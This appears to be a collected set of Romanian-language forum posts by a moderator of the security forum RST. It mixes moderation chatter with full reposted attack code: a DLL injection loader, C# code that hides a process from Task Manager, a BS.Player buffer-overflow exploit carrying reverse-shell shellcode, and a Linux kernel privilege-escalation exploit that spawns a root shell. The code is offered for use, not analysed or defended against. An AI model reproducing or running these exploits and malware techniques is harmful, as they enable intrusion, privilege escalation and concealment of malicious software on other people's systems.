Nytro

E foarte important sa ai o functie pe RST. Nici nu stii cat de bine merge: "Ce faci papuso? Aici Nytro, administrator RST!" E asul meu din maneca. Pica direct in genunchi in fata mea cand aud asta. :->

Am intrat prea tarziu, dar pot da un ban.

RST e iadul, locul unde toti devin mai rai. Dar nu e nimic rau in asta.

Interesant. Ban.

Da, interesant: "Cum sa folosesti un exploit". Intrebarea mea e simpla: Ce fac daca un site nu are DNN? Sau, de ce m-ar interesa sa "sparg" un site, doar pentru ca are DNN?

Posturile astea sunt salvate in aer, nu intr-un calculator care are desigur unul sau mai multe IP-uri. Voi aveti acces la Internet cu ajutorul lui Dumnezeu, nu datorita faptului ca PC-ul vostru e conectat la Internet printr-un IP (extern) unic. Etc. Ontopic: Sunt sigur ca nu se va intampla acest lucru. Cel putin nu in 10 zile. Probabil pe la mijlocul anului sau chiar mai tarziu va interveni aceasta criza.

Parerea mea temporara, dintre: virusz, Fitty, Flubber, ZeroCold si Synthesis.

Nu conteaza numarul de posturi ci calitatea acestora. Conteaza de asemenea si numarul de avertismente primite.

Nu se gaseste. Il are doar The Jester, cel care l-a creat. Si sper sa nu fie facut public niciodata. Daca va fi facut, va fi functional doar cateva zile probabil.

Foarte tare. Ban.

Da, urat. Trebuie sa va faceti cont. Si e si mai urat pentru ca e in italiana.

Posturile astea inutile le incadrez la Offtopic sau diverse alte abateri de la regulamet si pentru astfel de posturi se primesc avertismente. Si la 3 avertismente apare banul. Cred ca e mult mai bine asa.

Dragut, nu stiam asta, Backspace-ul meu iti multumeste

///////////////////////////////////////////////////////////////// // R00TSECURITY.ORG - YOUR SECURITY COMMUNITY // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // [2009-10-03] Dll Injection Using SetWindowsHookEx() // r00tsecurity -> Source Code Center :: Dll Injection Using SetWindowsHookEx() // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // GENERATED ON: 2011-01-13 | 17:34:45 ///////////////////////////////////////////////////////////////// CODE INFO The SetWindowsHookEx method The SetWindowsHookEx method is a little bit more intrusive than the first, and creates more of a commotion in the injected process, which we normally don\'t want. However, it is a little bit easier to use than the first, and does have it\'s own advantages (like being able to inject into every process on the system in one shot). The SetWindowsHookEx() function is designed to allow you to \"hook\" windows messages for a given thread. This requires that you inject a dll into that process\'s address space, so SetWindowsHookEx() handles all that for us. The dll must have a function for the hook that it created though, otherwise it will crash. SOURCE CODE #define PROC_NAME \"target.exe\" #define DLL_NAME \"injected.dll\" void LoadDll(char *procName, char *dllName); unsigned long GetTargetThreadIdFromProcname(char *procName); int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) { LoadDll(PROC_NAME, DLL_NAME); return 0; } void LoadDll(char *procName, char *dllName) { HMODULE hDll; unsigned long cbtProcAddr; hDll = LoadLibrary(dllName); cbtProcAddr = GetProcAddress(hDll, \"CBTProc\"); SetWindowsHookEx(WH_CBT, cbtProcAddr, hDll, GetTargetThreadIdFromProcName(procName)); return TRUE; } unsigned long GetTargetThreadIdFromProcname(char *procName) { PROCESSENTRY32 pe; HANDLE thSnapshot, hProcess; BOOL retval, ProcFound = false; unsigned long pTID, threadID; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, \"Error: unable to create toolhelp snapshot\", \"Loader\", NULL); return false; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, procName) ) { ProcFound = true; break; } retval = Process32Next(thSnapshot,&pe); pe.dwSize = sizeof(PROCESSENTRY32); } CloseHandle(thSnapshot); _asm { mov eax, fs:[0x18] add eax, 36 mov [pTID], eax } hProcess = OpenProcess(PROCESS_VM_READ, false, pe.th32ProcessID); ReadProcessMemory(hProcess, (const void *)pTID, &threadID, 4, NULL); CloseHandle(hProcess); return threadID; } // r00tsecurity -> Source Code Center :: Dll Injection Using SetWindowsHookEx()

///////////////////////////////////////////////////////////////// // R00TSECURITY.ORG - YOUR SECURITY COMMUNITY // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // [2008-07-15] Hide from Taskmanager // r00tsecurity -> Source Code Center :: Hide from Taskmanager // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // GENERATED ON: 2011-01-13 | 17:31:42 ///////////////////////////////////////////////////////////////// CODE INFO This code is based off a source in vb6 I saw once. I ported it to C# and it works perfectly (after a few adjustements SOURCE CODE :::=== WINAPI.CS ===::: using System; using System.Collections.Generic; using System.Text; using System.Runtime.InteropServices; namespace WinApi { class User32 { public const Int32 WM_COMMAND = 273; public const Int32 MF_ENABLED = 0; public const Int32 MF_GRAYED = 1; public const Int32 LVM_FIRST = 4096; public const Int32 LVM_DELETEITEM = (LVM_FIRST + 8); public const Int32 LVM_SORTITEMS = (LVM_FIRST + 48); [DllImport("user32", EntryPoint = "FindWindowA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 FindWindow(string lpClassName, string lpWindowName); [DllImport("user32", EntryPoint = "FindWindowExA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 FindWindowEx(Int32 hWnd1, Int32 hWnd2, string lpsz1, string lpsz2); [DllImport("user32", EntryPoint = "EnableWindow", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern bool EnableWindow(Int32 hwnd, Int32 fEnable); [DllImport("user32", EntryPoint = "GetMenu", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetMenu(Int32 hwnd); [DllImport("user32", EntryPoint = "GetSubMenu", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetSubMenu(Int32 hMenu, Int32 nPos); [DllImport("user32", EntryPoint = "GetMenuState", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetMenuState(Int32 hMenu, Int32 wID, Int32 wFlags); [DllImport("user32", EntryPoint = "GetMenuItemID", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetMenuItemID(Int32 hMenu, Int32 nPos); [DllImport("user32", EntryPoint = "EnableMenuItem", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 EnableMenuItem(Int32 hMenu, Int32 wIDEnableItem, Int32 wEnable); /*[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = false)] public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, StringBuilder lParam);*/ [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = false)] public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, String lParam); //Also can add 'ref' or 'out' ahead 'String lParam' // -- Do not use 'out String', use '[Out] StringBuilder' instead and initialize the string builder // with proper length first. Dunno why but that is the only thing that worked for me. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = false)] public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, IntPtr lParam); [DllImport("user32", EntryPoint = "GetDesktopWindow", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetDesktopWindow(); [DllImport("user32", EntryPoint = "LockWindowUpdate", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 LockWindowUpdate(Int32 hwndLock); } } :::=== FORM1.CS ===::: using WinApi; System.Timers.Timer taskmanTimer = new System.Timers.Timer(700); #region Hide from taskmanager //Begin remove proccess from taskman timer private void removeFromTaskManager() { taskmanTimer.Elapsed += new System.Timers.ElapsedEventHandler(taskmanTimer_Elapsed); taskmanTimer.Enabled = true; } //Timer to remove procces from taskmanager void taskmanTimer_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { Int32 lhWndParent = User32.FindWindow(null, "Windows Task Manager"); /////Define Handles////// Int32 lhWndDialog = 0; Int32 lhWndEndTaskButton = 0; Int32 lhWndEndProcessButton = 0; Int32 lhWndProcessList = 0; Int32 lhWndProcessHeader = 0; Int32 lhWndTaskList = 0; Int32 lhWndTaskHeader = 0; Int32 ProcessItemCount = 0; Int32 ProcessItemIndex = 0; Int32 TaskItemCount = 0; Int32 TaskItemIndex = 0; /////Get Menues///// //Get main menu Int32 hMenu = User32.GetMenu(lhWndParent); //Get View menu Int32 hViewMenu = User32.GetSubMenu(hMenu,2); //Get Update Speed Menu Int32 hUpdateSpeed = User32.GetSubMenu(hViewMenu, 1); //Get Refresh Now Button Int32 hRefreshNow = User32.GetMenuItemID(hViewMenu, 0); //Get High Int32 hHighRate = User32.GetMenuItemID(hUpdateSpeed, 0); //Get Normal Int32 hNormalRate = User32.GetMenuItemID(hUpdateSpeed, 1); //Get Low Int32 hLowRate = User32.GetMenuItemID(hUpdateSpeed, 2); //Get Paused Int32 hPausedRate = User32.GetMenuItemID(hUpdateSpeed, 3); for (int i = 1; i < 7; i++) { lhWndDialog = User32.FindWindowEx(lhWndParent, lhWndDialog, null, null); if(lhWndTaskList == 0) lhWndTaskList = User32.FindWindowEx(lhWndDialog, 0, "SysListView32", "Tasks"); if(lhWndTaskHeader == 0) lhWndTaskHeader = User32.FindWindowEx(lhWndTaskList, 0, "SysHeader32", null); if(lhWndEndTaskButton == 0) lhWndEndTaskButton = User32.FindWindowEx(lhWndDialog, lhWndTaskList, "Button", "&End Task"); if(lhWndProcessList == 0) lhWndProcessList = User32.FindWindowEx(lhWndDialog, 0, "SysListView32", "Processes"); if(lhWndProcessHeader == 0) lhWndProcessHeader = User32.FindWindowEx(lhWndProcessList, 0, "SysHeader32", null); if(lhWndEndProcessButton == 0) lhWndEndProcessButton = User32.FindWindowEx(lhWndDialog, lhWndProcessList, "Button", "&End Process"); } //Pause the update speed User32.SendMessage((IntPtr)lhWndParent, User32.WM_COMMAND, (IntPtr)hPausedRate, IntPtr.Zero); //User32.SendMessage((IntPtr)lhWndParent,(uint)User32.WM_COMMAND,(IntPtr)hPausedRate, /////Disable Menu Items////// User32.EnableMenuItem(hMenu,hRefreshNow,User32.MF_GRAYED); User32.EnableMenuItem(hMenu,hLowRate,User32.MF_GRAYED); User32.EnableMenuItem(hMenu,hNormalRate,User32.MF_GRAYED); User32.EnableMenuItem(hMenu,hHighRate,User32.MF_GRAYED); User32.EnableMenuItem(hHighRate, hPausedRate, User32.MF_GRAYED); User32.EnableWindow(lhWndProcessHeader, 0); User32.EnableWindow(lhWndTaskHeader, 0); Process[] Processes; Int32 z; string item; ListBox list = new ListBox(); list.Sorted = true; Processes = Process.GetProcesses(); foreach (Process p in Processes) { if (p.ProcessName.ToString() == "Idle") list.Items.Add("System Idle Process"); else list.Items.Add(p.ProcessName.ToString()); } ProcessItemCount = Processes.Length; ProcessItemCount--; string HideMe = Process.GetCurrentProcess().ProcessName; for (int x = 0; x != ProcessItemCount; x++) { item = list.Items[x].ToString(); if (item == HideMe) proccessIndex = x; } User32.LockWindowUpdate(lhWndProcessList); //refresh User32.SendMessage((IntPtr)lhWndParent, User32.WM_COMMAND, (IntPtr)hRefreshNow, IntPtr.Zero); //sort items User32.SendMessage((IntPtr)lhWndProcessList, User32.LVM_SORTITEMS, IntPtr.Zero,null); //Delete ourselves from the list >=D User32.SendMessage((IntPtr)lhWndProcessList, User32.LVM_DELETEITEM, (IntPtr)proccessIndex, IntPtr.Zero); User32.LockWindowUpdate(0); if (lhWndParent == 0) //taskmanager is closed refrsh every 800 miliseconds taskmanTimer.Interval = 800; else //taskmanager is open and paused. we don't have to refresh as fast taskmanTimer.Interval = 2500; } #endregion removeFromTaskManager(); // r00tsecurity -> Source Code Center :: Hide from Taskmanager

Am vazut si eu astea acum cateva zile, dar sunt obisnuit cu astfel de "persoane care se pricep la calculatoare", vedeam mult pe Hellshit. Cel putin, aici, la Offtopic-ul nostru cel de toate zilele nu isi etaleaza nimeni cunostintele incredibile in diverse domenii.

Nu se va inchide. Nu va place sectiunea, nu o vizitati. Apar multe lucruri interesante acolo, desigur, de multe ori nu au legatura cu IT-ul, dar tot sunt interesante. Nu pot fi numai discutii tehnice, si nici nu prea sunt, macar mai discutam cate ceva pe acolo. Nu asa se va scapa de posturile stupide si inutile.

Genul acela de tutoriale sunt pentru "Hacking in viata de zi cu zi" daca putem spune asta, si eu nu vad nimic rau in ele. Stai linistit, sunt destule tutoriale pe care le poti citi.

Bafta tuturor celor care incep sesiunea. E cineva la Informatica la Universitatea - Bucuresti? De maine ma apuc de invatat. Deci cred ca o sa dau mai rar pe aici, sa fiti cuminti.

Da, cred ca e necesara. Eu m-am trezit dimineata, am vazut-o facuta si m-am culcat la loc. Cand m-am trezit aveam impresia ca am visat RST, ca erau categorii noi...

Daca nu e putina disciplina nu se ajunge nicaieri. Problema e ca nimeni nu citeste regulile si in general nu sunt citite topicurile de la "Anunturi" unde se fac diverse precizari. Nu sterg topicuri, decat foarte rar, dar le mut, de cele mai multe ori la Ajutor sau la Cereri, unde le este locul. De ce cacat postati aici orice, cand acel orice are o categorie speciala destinata lui? Ex. http://rstcenter.com/forum/30130-help-download-podcast.rst Fusese postat la Offtopic, cand trebuia postat la Ajutor. Daca ar posta toti tot ce le trece prin cap aici ce ar iesi? Dar nu, trebuie sa dau eu warn-uri si sa stau sa mut topicuri pentru voi...

State of the Art Post Exploitation in Hardened PHP Environments Author: Stefan Esser Abstract In this paper we discuss the different protections an attacker faces in hardened PHP environments, after he succeeded in executing arbitrary PHP code. We introduce new techniques to overcome most of them by the use of local PHP exploits. We demonstrate how info leak and memory corruption vulnerabilities can be combined to enable PHP applications to read and write arbitrary memory. We will show step by step how important memory structures can be leaked and manipulated in order to deactivate or overcome protections. Download: http://www.exploit-db.com/download_pdf/15955 Mai tehnic decat articolele "clasice".

Advanced MySQL Exploitation Author: Muhaimin Dzulfakar Contents 1 Abstract...........................................................................................................................................3 2 Introduction ...................................................................................................................................3 3 Stacked Query................................................................................................................................3 4 Attacking MySQL on applications that do support stacked queries...............................................4 5 Attacking MySQL on applications that do not support stacked queries........................................5 6 Fingerprinting the web server directory.........................................................................................7 6.1 Fingerprint through error message method................................................................................7 6.2 Fingerprint through LOAD_FILE method......................................................................................7 7 Maximum size of arbitrary code allowed........................................................................................7 8 Arbitrary file compression/decompression ....................................................................................8 9 Dealing with columns......................................................................................................................8 10 Remote code execution on LAMP.................................................................................................9 11 Remote code execution on WAMP.............................................................................................10 References .......................................................................................................................................11 Download: http://www.exploit-db.com/download_pdf/15956 Vedeti referintele.

Exploit Buffer Overfloe Bsplayer 2.57(UNICODE-SEH) Nu stiu daca merge, dar daca merge se pot face lucruri dragute cu el. # # #[+]Exploit Title: Exploit Buffer Overfloe Bsplayer 2.57(UNICODE-SEH) #[+]Date: 01\07\2010 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.bsplayer.com/services/downlad-free-bsplayer.php?type=2 #[+]Version: 2.57 #[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN #[+]CVE: N/A # # # ######### ## ######### ######### ## ############### # ######### #### ######### ######### ## ## ## # ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ## ## # ## ########## ######## ######## ## ## ## # ## ## ## ## ## ## ## # ## ## ## ## ## ## ## # ######## ## ######## ######### ## ## ## # ######## ## ######## ######### \/ ############### # #Created By C4SS!0 G0M3S #Louredo_@hotmail.com #www.invasao.com.br # # import os import sys import time import string os.system("cls") os.system("color 4f") def usage(): print "\n" print "[+]Exploit: Exploit Buffer Overflow Bsplayer(UNICODE-SEH)" print "[+]Date: 01\\07\\2010" print "[+]Author: C4SS!0 G0M3S" print "[+]Home: www.invasao.com.br" print "[+]E-mail: Louredo_@hotmail.com" print "[+]Version: 2.57" print "[+]Software: Bsplayer 2.57\n" print "[-]Note:" print "TO EXPLOIT THE RUN FILE NAME MUST BE FILE_NAME.M3U\n" if((len(sys.argv)!=3) or (int(sys.argv[1])<1) or (int(sys.argv[1])>2)): usage() print "Payloads:\n1 - WinExec(\"Calc.exe\",0)\n2 - Reverse_Tcp_Shell\n" print "[-]Usage: "+sys.argv[0]+" <Playload Number> <File Name>" print "[-]Exemple: "+sys.argv[0]+" 1 Exploit.m3u" sys.exit(0) usage() buffer = "\x42" * 4102 nseh = "\x61\x6d" seh = "\xde\x4e" #pop ebx - pop ebp - ret at 0x004E00DE [bsplayer.exe] egg_hunter = "\x45\x61\x45\x61\x45\x50\x45\xc3" junk = "\x45" * 1094 print "[*]Identifying the length Shellcode" time.sleep(1) if int(sys.argv[1]) == 2: shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ" "ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBNKWY7N4PV9X6PQX1PV9JYNZ9SDMTZTR" # "83SY0KT01RPLLLCBPLLT2RLPJX9KKTOX3NZUKKV0VLK3Y3MLRONMMJU2VWC8VQKQSOPTZT3CTK1LPUR6" # "KZR65RJC7NPWDLVRZQUMFMV85BXR7BOG8SCKUNXUVMVGIPMKJJZ6XSQ40ORI2UTOWNWRXVF679XJWYPL" #FROM METASPLOIT FRAMEWORK "OU2QOXQNN0GGLNM3HJLRVWUSKO4OWMVOZKXLKLY2B3U1BQMPEBVMQEEFULKP12N8GHWH43CROTS2NPPD" # "QT0YXLS5MOM3OCKSRWPFLJWWN19PSXXOFKYD7KLN3WYMFFEJY7LO785W6C1TM7MOURUH7EOM1FZTEMOJ" #SHELLCODE REVERSE_TCP_SHELL ON PORT 4444 "28TUN2LK0SKNTKKPHJSDRKLFONNC2620QXQTRFZUE3UGR8TOL5V3YO47PRSMMBURNNL9MNEHNELX5NOW" # "Q8C5UPOLK3BIRSQBOXVDD9STOI8LHBM1Y3PEPOKMQOMKRN8JZIJ3MPJ0VRRYY92VP0DLVJ3TVJFWKSKB" #PROMPT: "QCMXW7O30CRZRF7JK7JV4S2SRM9M5RRTOZZVFYQQDKKW1LY7S6LZFJLLZNXMJB685QOJGLNKNITOCZSK" # "QITVVPONFL6LN0O1RVBINM6OLML4XL0TNL6RRVN28UOKSULQJXYLLY9NLM57LVDS8NY2PMQ3MORRMHQD" #C:\>Telnet 127.0.0.1 4444 "BEINV9QY8U0MN1ZTUPPO3KGMVDOQWLNEUOJLWKE6UPNMBX12QURRNVJN78DYMXKOMHNA") # # if int(sys.argv[1]) == 1: shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ" "ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBIKY0NQ99GO3LLVRPHLXY2TMTL46QMNR" "8P1SHN853YXKLKSSHQXL4TENPSHWL3599RX6VNCJUKCH4VNSMM25ZOJP2MLWORBZMMM1DJ5QVO9MQ9W4" "V30ZUBQWZLFP5KELTXGCLKKMKLE2KZPNG9MOXKMNBNXMKVBK893KGOKSJXOPLPOMS8SR3UTPWKGHXOKT" "CDN4CMOQG1C34R171NSXML5WVKE7QSN4XL5VJZQM5W8O669OMOK90J9KN0Q31VVLNNOCUN957X7SHNOP" "YTP3KXWLE3O9XCKXJA") print "[*]The Length Shellcode:"+str(len(shellcode)) time.sleep(1) shellcode += "\x41" * 5000 file = str(sys.argv[2]) payload = buffer+nseh+seh+egg_hunter+junk+shellcode op = "w" print "[*]Creating Your File "+file time.sleep(1) try: f = open(file,op) f.write("http://"+payload) f.close() print "[*]The File "+file+" was Successfully Created" except: print "[*]Error Creating File "+file Sursa: BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)

Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) Nu m-am uitat peste el, o sa vad care e treaba cand am putin timp liber. /* * Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) * by Joe Sylve * @jtsylve on twitter * * Released: Jan 7, 2011 * * Based on the bug found by Dan Rosenberg (@djrbliss) * only loosly based on his exploit http://www.exploit-db.com/exploits/15916/ * * Usage: * gcc -w caps-to-root2.c -o caps-to-root2 * sudo setcap cap_sys_admin+ep caps-to-root2 * ./caps-to-root2 * * Kernel Version >= 2.6.34 (untested on earlier versions) * * Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit * * This exploit takes advantage of the same underflow as the original, * but takes a different approach. Instead of underflowing into userspace * (which doesn't work on 64-bit systems and is a lot of work), I underflow * to some static values inside of the kernel which are referenced as pointers * to userspace. This method is pretty simple and seems to be reliable. */ #include <stdio.h> #include <sys/socket.h> #include <errno.h> #include <string.h> #include <sys/mman.h> #include <unistd.h> // Skeleton Structures of the Kernel Structures we're going to spoof struct proto_ops_skel { int family; void *buffer1[8]; int (*ioctl)(void *, int, long); void *buffer2[12]; }; struct phonet_protocol_skel { void *ops; void *prot; int sock_type; }; #ifdef __x86_64__ #define SYM_NAME "local_port_range" #define SYM_ADDRESS 0x0000007f00000040 #define SYM_OFFSET 0x0 typedef int (* _commit_creds)(unsigned long cred); typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred); #else //32-bit #define SYM_NAME "pn_proto" #define SYM_ADDRESS 0x4e4f4850 #define SYM_OFFSET 0x90 typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); #endif _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int getroot(void * v, int i, long l) { commit_creds(prepare_kernel_cred(0)); return 0; } /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret; char command[512]; sprintf(command, "grep \"%s\" /proc/kallsyms", name); f = popen(command, "r"); while(ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); pclose(f); return addr; } } pclose(f); return 0; } int main(int argc, char * argv[]) { int sock, proto; unsigned long proto_tab, low_kern_sym, pn_proto; void * map; /* Create a socket to load the module for symbol support */ printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n"); sock = socket(PF_PHONET, SOCK_DGRAM, 0); if(sock < 0) { if(errno == EPERM) printf("[*] You don't have CAP_SYS_ADMIN.\n"); else printf("[*] Failed to open Phonet socket.\n"); return -1; } close(sock); /* Resolve kernel symbols */ printf("[*] Resolving kernel symbols...\n"); proto_tab = get_kernel_sym("proto_tab"); low_kern_sym = get_kernel_sym(SYM_NAME) + SYM_OFFSET; pn_proto = get_kernel_sym("pn_proto"); commit_creds = (void *) get_kernel_sym("commit_creds"); prepare_kernel_cred = (void *) get_kernel_sym("prepare_kernel_cred"); if(!proto_tab || !commit_creds || !prepare_kernel_cred) { printf("[*] Failed to resolve kernel symbols.\n"); return -1; } if (low_kern_sym >= proto_tab) { printf("[*] %s is mapped higher than prototab. Can not underflow .\n", SYM_NAME); return -1; } /* Map it */ printf("[*] Preparing fake structures...\n"); const struct proto_ops_skel fake_proto_ops2 = { .family = AF_PHONET, .ioctl = &getroot, }; struct phonet_protocol_skel pps = { .ops = (void *) &fake_proto_ops2, .prot = (void *) pn_proto, .sock_type = SOCK_DGRAM, }; printf("[*] Copying Structures.\n"); map = mmap((void *) SYM_ADDRESS, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if(map == MAP_FAILED) { printf("[*] Failed to map landing area.\n"); perror("mmap"); return -1; } memcpy((void *) SYM_ADDRESS, &pps, sizeof(pps)); // Calculate Underflow proto = -((proto_tab - low_kern_sym) / sizeof(void *)); printf("[*] Underflowing with offset %d\n", proto); sock = socket(PF_PHONET, SOCK_DGRAM, proto); if(sock < 0) { printf("[*] Underflow failed .\n"); return -1; } printf("[*] Elevating privlidges...\n"); ioctl(sock, 0, NULL); if(getuid()) { printf("[*] Exploit failed to get root.\n"); return -1; } printf("[*] This was a triumph... I'm making a note here, huge success.\n"); execl("/bin/sh", "/bin/sh", NULL); close(sock); munmap(map, 0x1000); return 0; } Sursa: Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)